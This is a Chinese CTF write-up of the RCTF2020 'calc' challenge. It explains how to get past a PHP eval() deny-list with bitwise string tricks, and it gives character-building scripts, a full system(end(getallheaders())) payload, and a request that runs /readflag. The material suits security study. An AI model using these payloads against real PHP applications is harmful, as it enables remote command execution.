
RCTF2020-复现

WEB

1.calc

RoarCTF2020的easy_calc的升级版,过滤了更多字符,但思路还是一样的

<?php
// Challenge source. The "calculator" evaluates the `num` query parameter
// with eval() after checking it against a deny-list.
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    // Deny-list of patterns applied to the raw request text: letters (the
    // `i` flag makes `[a-z]` cover A-Z too), bytes 0x7f-0xff, whitespace,
    // quotes, backticks, square brackets, `$`, `_`, backslash, `^` and `,`.
    // Digits, parentheses, `.`, `{}`, `|`, `&`, `~`, `!` and `/` are not
    // listed, which is what the constructions later on this page rely on.
    $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', '`', '\[', '\]','\$', '_', '\\\\','\^', ','];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/im', $str)) {
            die("what are you want to do?");
        }
    }
    // Root cause: attacker-controlled text is concatenated straight into
    // eval(). A deny-list in front of eval() is not a security boundary --
    // PHP's string/bitwise operators can build any byte from digits -- so the
    // fix is to never eval() user input and to parse arithmetic with a real
    // expression evaluator. `@` plus error_reporting(0) also hide the
    // division-by-zero warning some of the constructions trigger.
    @eval('echo '.$str.';');
}
?>

在 PHP 中,将两个数字使用 . 拼接,会当做字符串来处理,返回的也是一个字符串。例如:(1).(2) 出来的就是字符串"12",然后可以用 {} 来代替 [] 来取单个字符。所以我们可以先获得一部分字符,然后用位运算获取所有的字符。

<?php
// Characters obtainable from PHP's own number-to-string conversion. The
// deny-list allows digits and `.`, so a number concatenated to another
// becomes a string whose characters can be picked out with `{n}`.
// NOTE(review): `{}` string offsets were removed in PHP 8.0 and `0/0`
// throws DivisionByZeroError there; the results noted below are for PHP 7.
// 9999999999999999999 exceeds PHP_INT_MAX and becomes the float 1.0E+19,
// so the concatenation is the string "1.0E+190".
echo(((9999999999999999999).(0)){1}); // .
echo(((9999999999999999999).(0)){3}); //E
echo(((9999999999999999999).(0)){4}); // +
print("\n");

// 999**999 overflows to INF, giving the string "INF0".
echo(((999**999).(0)){0}); //I
echo(((999**999).(0)){1}); // N
echo(((999**999).(0)){2}); // F

print("\n");

// 0/0 evaluates to NAN (with a warning) on PHP 7, giving "NAN0".
echo(((0/0).(0)){1}); // A

print("\n");

// Bitwise OR on two one-character strings ORs their byte values, which
// yields characters that appear in no literal at all.
echo("1" | "E");//u
echo("3" | "E"); // w
echo("4" | "I"); // }
echo("0" | "I"); // y
echo("0" | "F"); //v

chamd5的构造脚本

# Brute-force search for a way to express `input_value` with PHP's string
# bitwise operators, starting from the characters that can be produced
# directly (digits, the ones taken out of "1.0E+19", "INF" and "NAN", and
# the few OR results shown above). Each pass extends `strings` with every
# new character reachable in one more operation and prints the operand
# pair whenever the target is hit.
# NOTE(review): indentation was lost in the source; the structure below is
# reconstructed with `if data == input_value` as a sibling of the
# `if data not in strings` check -- confirm against the original.
strings = ['0','1','2','3','4','5','6','7','8','9','E','u','w','}','+','.','I','N','F','y','v']

# Target character to derive.
input_value = 'o'

# Pass 1: bytewise OR. Appending to `strings` while iterating it is
# deliberate: the list iterator keeps going over the appended items, so
# the loop computes the closure of the set under `|`.
for s in strings:
    for s1 in strings:
        data = (chr(ord(s)|ord(s1))).strip()
        if data not in strings:
            strings.append(data)
        if data == input_value:
            print('success',s,'|',s1)

print(len(strings))

# Pass 2: bytewise AND, report only (results are not added to `strings`).
for s in strings:
    for s1 in strings:
        data = (chr(ord(s)&ord(s1)))
        data = data.strip()
        if data == input_value:
            print('success',s,'&',s1)
print(len(strings))
# Pass 3: OR again over the enlarged set.
for s in strings:
    for s1 in strings:
        data = (chr(ord(s)|ord(s1))).strip()
        if data not in strings:
            strings.append(data)
        if data == input_value:
            print('success',s,'|',s1)
print(len(strings))
# Pass 4: AND, this time extending `strings`. strip() turns a whitespace
# result (e.g. '+' & '0' is a space) into '', which then gets appended; the
# bare except swallows the TypeError that ord('') raises on later pairs.
for s in strings:
    for s1 in strings:
        try:
            data = (chr(ord(s)&ord(s1))).strip()
        except:
            continue
        if data not in strings:
            strings.append(data)

        if data == input_value:
            print('success',s,'&',s1)

# Pass 5: bitwise NOT. ~ord(s) is negative, so chr() raises ValueError for
# every entry and the except skips it -- this pass finds nothing in Python,
# even though PHP's `~` on a one-byte string does produce a byte.
for s in strings:
    try:
        data = chr(~ord(s))
    except:
        continue
    data = data.strip()
    if data not in strings:
        strings.append(data)
    if data == input_value:
        print('success ~',s)

手工拼了个 pHpINFo

// Builds the string "pHpINFo" one character at a time (PHP function names
// are case-insensitive, so it resolves to phpinfo when called). Each line
// ANDs/ORs single characters taken from "0", "INF0" and "1.0E+19"; the
// trailing comment records the pair used. `{}` string offsets need PHP 7.
$a='';
$a.=(((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2})); //p=y&v
$a.= (((0).(0){0})|(((999**999).(0)){0}))&(((999**999).(0)){1});//H=y&N
$a.=(((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2})); //p=y&v
$a.=(((999**999).(0)){0}); //I
$a.=(((999**999).(0)){1}); //N
$a.= (((3).(0){0})|(((9999999999999999999).(0)){3}))&(((999**999).(0)){1});//F=w & N
$a.= (((9999999999999999999).(0)){3})|(((9999999999999999999).(0)){4});//o=E | +
echo $a;

完整的payload

(((((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2}))).((((0).(0){0})|(((999**999).(0)){0}))&(((999**999).(0)){1})).((((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2}))).((((999**999).(0)){0})).((((999**999).(0)){1})).((((3).(0){0})|(((9999999999999999999).(0)){3}))&(((999**999).(0)){1})).((((9999999999999999999).(0)){3})|(((9999999999999999999).(0)){4})))()

后面的不拼了…… 直接用师傅们的payload

题目中断了外网,并且需要执行 /readflag,即需要一个 shell 来进行命令执行。

  • 有几种方式
  1. system(end(getallheaders()));

  2. system(file_get_contents("php://input"));

  3. 把脚本内容写到一个文件, 最后执行

system(end(getallheaders())); 的 payload:

<?php 
// Builds "systEm" (calls resolve case-insensitively, so this is system()).
// Every letter derives from 'E' = "1.0E+19"{3}: ('E' & (~'7' | '0')) is
// '@' (0x40), and OR-ing a digit onto '@' gives 'p'..'y'; the last
// character is 'E' | '-', with '-' taken from "-11". Note that `~` on a
// string is applied bytewise at run time and yields bytes >= 0x80, which the
// deny-list (matched on the request text only) never sees.
$a ='';
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(9)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}));
$a .= (((10000000000000000000).(1)){3});
$a .= ((((10000000000000000000).(1)){3})|(((-1).(1)){0}));
echo $a; //systEm
?>

<?php
// Builds "EnD" (the end() function, used above to take the last request
// header). 'E' is "1.0E+19"{3}; ('E' | '.') is 'o', and AND-ing it with
// (~'7' | '0' | '6') clears one bit to give 'n'; the same mask applied to
// 'E' alone gives 'D'. '.' comes from "1.11"{1}.
$a ='';
$a .= (((10000000000000000000).(1)){3}); // E
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(6)){1}))); //n
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(6)){1}))); //D
echo $a; //EnD
?>

<?php // getallheaders
// Builds "getallheaders" with the same primitives as the two snippets above:
// 'E' from "1.0E+19", '.' from "1.11", digits, and bytewise ~/&/| to
// combine them. Assembled as systEm(EnD(getallheaders())) -- see the final
// payload below -- it executes the value of the last request header.
$a ='';
$a .= ((((10000000000000000000).(1)){3})|(((1.1).(1)){1})&((~(((1).(8)){1})|(((1).(7)){1})))); // g
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1})); //T
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(1)){1}))); //a
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); // l
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); // l
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))); // h
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(1)){1}))); //a
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); //D
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(2)){1})); // r
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1})); // s
echo $a;
?>

最后需要通过 /readflag 的验证码,可以使用 Perl,也可以通过 php -r "" 的方式执行

php -r "eval(base64_decode('JHByb2Nlc3MgPSBwcm9jX29wZW4oDQogJy9yZWFkZmxhZycsDQogW1sicGlwZSIsICJyIl0sWyJwaXBlIiwgInciXSxbInBpcGUiLCAidyJdXSwkcGlwZXMNCik7DQpmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KJGV4cCA9IGZyZWFkKCRwaXBlc1sxXSwgMTAyNCk7DQokZXhwID0gZXhwbG9kZSgiXG4iLCAkZXhwKVswXTsNCmZ3cml0ZSgkcGlwZXNbMF0sIGV2YWwoInJldHVybiAkZXhwOyIpLiJcbiIpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0K'));"

最终的payload

GET /calc.php?num=(((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(9))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D)).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%7C(((-1).(1))%7B0%7D)))(((((10000000000000000000).(1))%7B3%7D).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(6))%7B1%7D))).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(6))%7B1%7D))))((((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D)%26((~(((1).(8))%7B1%7D)%7C(((1).(7))%7B1%7D)))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(1))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(0))%7B1%7D))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(1))%7B1%7D))).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(2))%7B1%7D)).((((10000000000
000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)))()))%3B HTTP/1.1
Host: 124.156.140.90:8081
z: php -r "eval(base64_decode('JHByb2Nlc3MgPSBwcm9jX29wZW4oDQogJy9yZWFkZmxhZycsDQogW1sicGlwZSIsICJyIl0sWyJwaXBlIiwgInciXSxbInBpcGUiLCAidyJdXSwkcGlwZXMNCik7DQpmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KJGV4cCA9IGZyZWFkKCRwaXBlc1sxXSwgMTAyNCk7DQokZXhwID0gZXhwbG9kZSgiXG4iLCAkZXhwKVswXTsNCmZ3cml0ZSgkcGlwZXNbMF0sIGV2YWwoInJldHVybiAkZXhwOyIpLiJcbiIpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0K'));"

后面又看到了开心师傅的脚本

# -*- coding: utf-8 -*-
""" Python
Author: Mrkaixin
Date: 2020-05-30 21:32
FileName: exp.py
"""
import string

# Character -> PHP expression that evaluates to that character using only
# what the challenge's deny-list leaves available (digits, parentheses, `.`,
# `{n}` string offsets and the bitwise string operators). The fragments are
# already URL-encoded for pasting into a query string: `%26` is `&`, and
# `%30`/`%34`/`%39` are the digits 0/4/9. Building blocks:
#   ((N).(M))                 -> the string "NM"
#   ((99999999999999999999).(1)){k}
#                             -> a character of "1.0E+20" . "1"; the literal
#                                overflows to a float, and {1}/{4} pick out
#                                "." and "+"
#   ((1).(1/!1)){k}           -> `!1` is false, so 1/false divides by zero
#                                and gives INF on PHP 7; the string is "1INF"
#   ~((6).(1))                -> bytewise NOT of "61"; AND-ing "F" with it
#                                yields "@" (0x40), the base the lower-case
#                                letters are OR-ed onto
# NOTE(review): `{}` string offsets were removed in PHP 8.0 and division by
# zero throws there, so this table only works against PHP 7.
word_dict = {
# digits: concatenation with "0" keeps the literal a string
"0": "((0).(0))",
"1": "((1).(0))",
"2": "((2).(0))",
"3": "((3).(0))",
"4": "((4).(0))",
"5": "((5).(0))",
"6": "((6).(0))",
"7": "((7).(0))",
"8": "((8).(0))",
"9": "((9).(0))",
# punctuation
"=": "(((1).(0)))|(((4).(0))|((8).(0))){0}",
"+": "((99999999999999999999).(1)){4}",
".": "((99999999999999999999).(1)){1}",
"<": "(((4).(0))|((8).(0))){0}",
"$": "(((4).(0)))%26((99999999999999999999).(1)){1}",
"@": "(((1).(1/!1)){3})%26~((6).(1))",
"~": "(((0).(0)))|(((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",

"{": "(((0).(0)))|(((99999999999999999999).(1)){4})|(((1).(1/!1)){3})%26~((6).(1))",
"}": "(((0).(0)))|((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((2).(3))",
",": "(((99999999999999999999).(1)){1})%26(((4).(0))|((8).(0))){0}",
"(": "(((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0}",
")": "(((9).(0)))%26((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4}",
# lower-case letters
"d": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",
"e": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((8).(3))",
"f": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((4).(1))",
"h": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((1).(1/!1)){3})%26~((6).(1))",
"i": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((2).(1/!1)){1})%26~((8).(3))",
"j": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((1).(1/!1)){3})%26~((4).(1))",
"k": "(((99999999999999999999).(1)){4})|(((1).(1/!1)){3})%26~((6).(1))",
"l": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((5).(3))",
"m": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((2).(3))",
"n": "(((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",
"o": "(((99999999999999999999).(1)){4})|(((2).(1/!1)){2})%26~((3).(3))",
# "p".."y" are "@" (0x40) OR-ed with the digit "0".."9"
"p": "(((1).(1/!1)){3})%26~((6).(1))|((0).(0)){0}",
"q": "(((1).(1/!1)){3})%26~((6).(1))|((1).(0)){0}",
"r": "(((1).(1/!1)){3})%26~((6).(1))|((2).(0)){0}",
"s": "(((1).(1/!1)){3})%26~((6).(1))|((3).(0)){0}",
"t": "(((1).(1/!1)){3})%26~((6).(1))|((4).(0)){0}",
"u": "(((1).(1/!1)){3})%26~((6).(1))|((5).(0)){0}",
"v": "(((1).(1/!1)){3})%26~((6).(1))|((6).(0)){0}",
"w": "(((1).(1/!1)){3})%26~((6).(1))|((7).(0)){0}",
"x": "(((1).(1/!1)){3})%26~((6).(1))|((8).(0)){0}",
"y": "(((1).(1/!1)){3})%26~((6).(1))|((9).(0)){0}",
"z": "(((1).(1/!1)){3})%26~((6).(1))|((8).(0)){0}|((2).(0)){0}",
# upper-case letters
"E": "((((2).(1/!1)){1})%26~((8).(3)))|(((2).(1/!1)){2})%26~((2).(1))%26~((9).(1))",
"G": "((((2).(1/!1)){1})%26~((8).(3)))|(((1).(1/!1)){2})%26~((%39).(1))",
"K": "((((1).(1/!1)){3})%26~((4).(1)))|(((2).(1/!1)){1})%26~((2).(3))",
"M": "((((2).(1/!1)){1})%26~((8).(3)))|(((2).(1/!1)){2})%26~((3).(3))",
"O": "((((2).(1/!1)){1})%26~((8).(3)))|(((1).(1/!1)){2})%26~((%30).(1))",
"B": "(((1).(1/!1)){3})%26~((4).(1))",
"C": "((((1).(1/!1)){3})%26~((4).(1)))|(((2).(1/!1)){1})%26~((8).(3))",
"A": "(((2).(1/!1)){1})%26~((8).(3))",
"I": "(((2).(1/!1)){1})%26~((2).(3))",
"H": "(((2).(1/!1)){1})%26~((5).(3))",
"L": "(((2).(1/!1)){2})%26~((3).(3))",
"D": "(((2).(1/!1)){2})%26~((2).(1))%26~((9).(1))",
"N": "(((1).(1/!1)){2})%26~((%30).(1))",
"J": "(((1).(1/!1)){2})%26~((%34).(1))",
"F": "(((1).(1/!1)){2})%26~((%39).(1))",
}

# Characters that already have an expression in word_dict.
got = list(word_dict)

# Characters to search an expression for (edit as needed; best used together
# with the other search script referenced on this page).
iwant = string.ascii_letters + "_"


def Or():
    """Print a ``word_dict`` line for every wanted character reachable as
    ``a | b`` with ``a`` and ``b`` both already in ``got``.

    For each character in ``iwant`` the first matching pair (in ``got``
    order) is printed in the same ``"char":"expr",`` form as ``word_dict``,
    the two expressions joined by ``|``; characters with no such pair print
    nothing. ``got`` is never extended, so every result is exactly one
    operation away from an existing entry.
    """
    # NOTE(review): indentation was lost in the source; the print is assumed
    # to sit inside the `if d == need` branch (otherwise it would fire for
    # every pair) -- confirm against the original.
    for need in iwant:
        flag = 0  # set once a pair is found; both loops check it to bail out
        for i in got:
            if flag == 1: break
            for j in got:
                if flag == 1: break
                d = chr(ord(i) | ord(j))
                if d == need:
                    flag = 1

                    print(f"\"{d}\":\"({word_dict[i]})|{word_dict[j]}\",")


def And():
    """Print a ``word_dict`` line for every wanted character reachable as
    ``a & b`` with ``a`` and ``b`` both already in ``got``.

    Same search as ``Or`` but with bytewise AND; the printed expression
    joins the two operands with ``%26`` (URL-encoded ``&``) so it can be
    pasted straight into a query string. Only the first pair per character
    is printed and ``got`` is never extended.
    """
    # NOTE(review): indentation was lost in the source; the print is assumed
    # to sit inside the `if d == need` branch -- confirm against the original.
    for need in iwant:
        flag = 0  # set once a pair is found; both loops check it to bail out
        for i in got:
            if flag == 1: break
            for j in got:
                if flag == 1: break
                d = chr(ord(i) & ord(j))
                if d == need:
                    flag = 1

                    print(f"\"{d}\":\"({word_dict[i]})%26{word_dict[j]}\",")


def product():
    """Print the encoded form of each character of ``exp``, one per line.

    ``exp`` is the string to encode (empty in this copy, so nothing is
    printed). A character present in ``got`` is printed as ``(<expr>).``;
    a character whose upper-case form is present uses that entry instead;
    anything else is printed as the character followed by ``lost``.
    """
    exp = ""
    for ch in exp:
        if ch in got:
            fragment = word_dict[ch]
        elif ch.upper() in got:
            fragment = word_dict[ch.upper()]
        else:
            print(ch + "lost")
            continue
        print(f"({fragment}).")


if __name__ == '__main__':
    # Only the AND search runs by default; switch to Or() for the OR search
    # or to product() to encode the string set inside it.
    And()
    # Or()
    # product()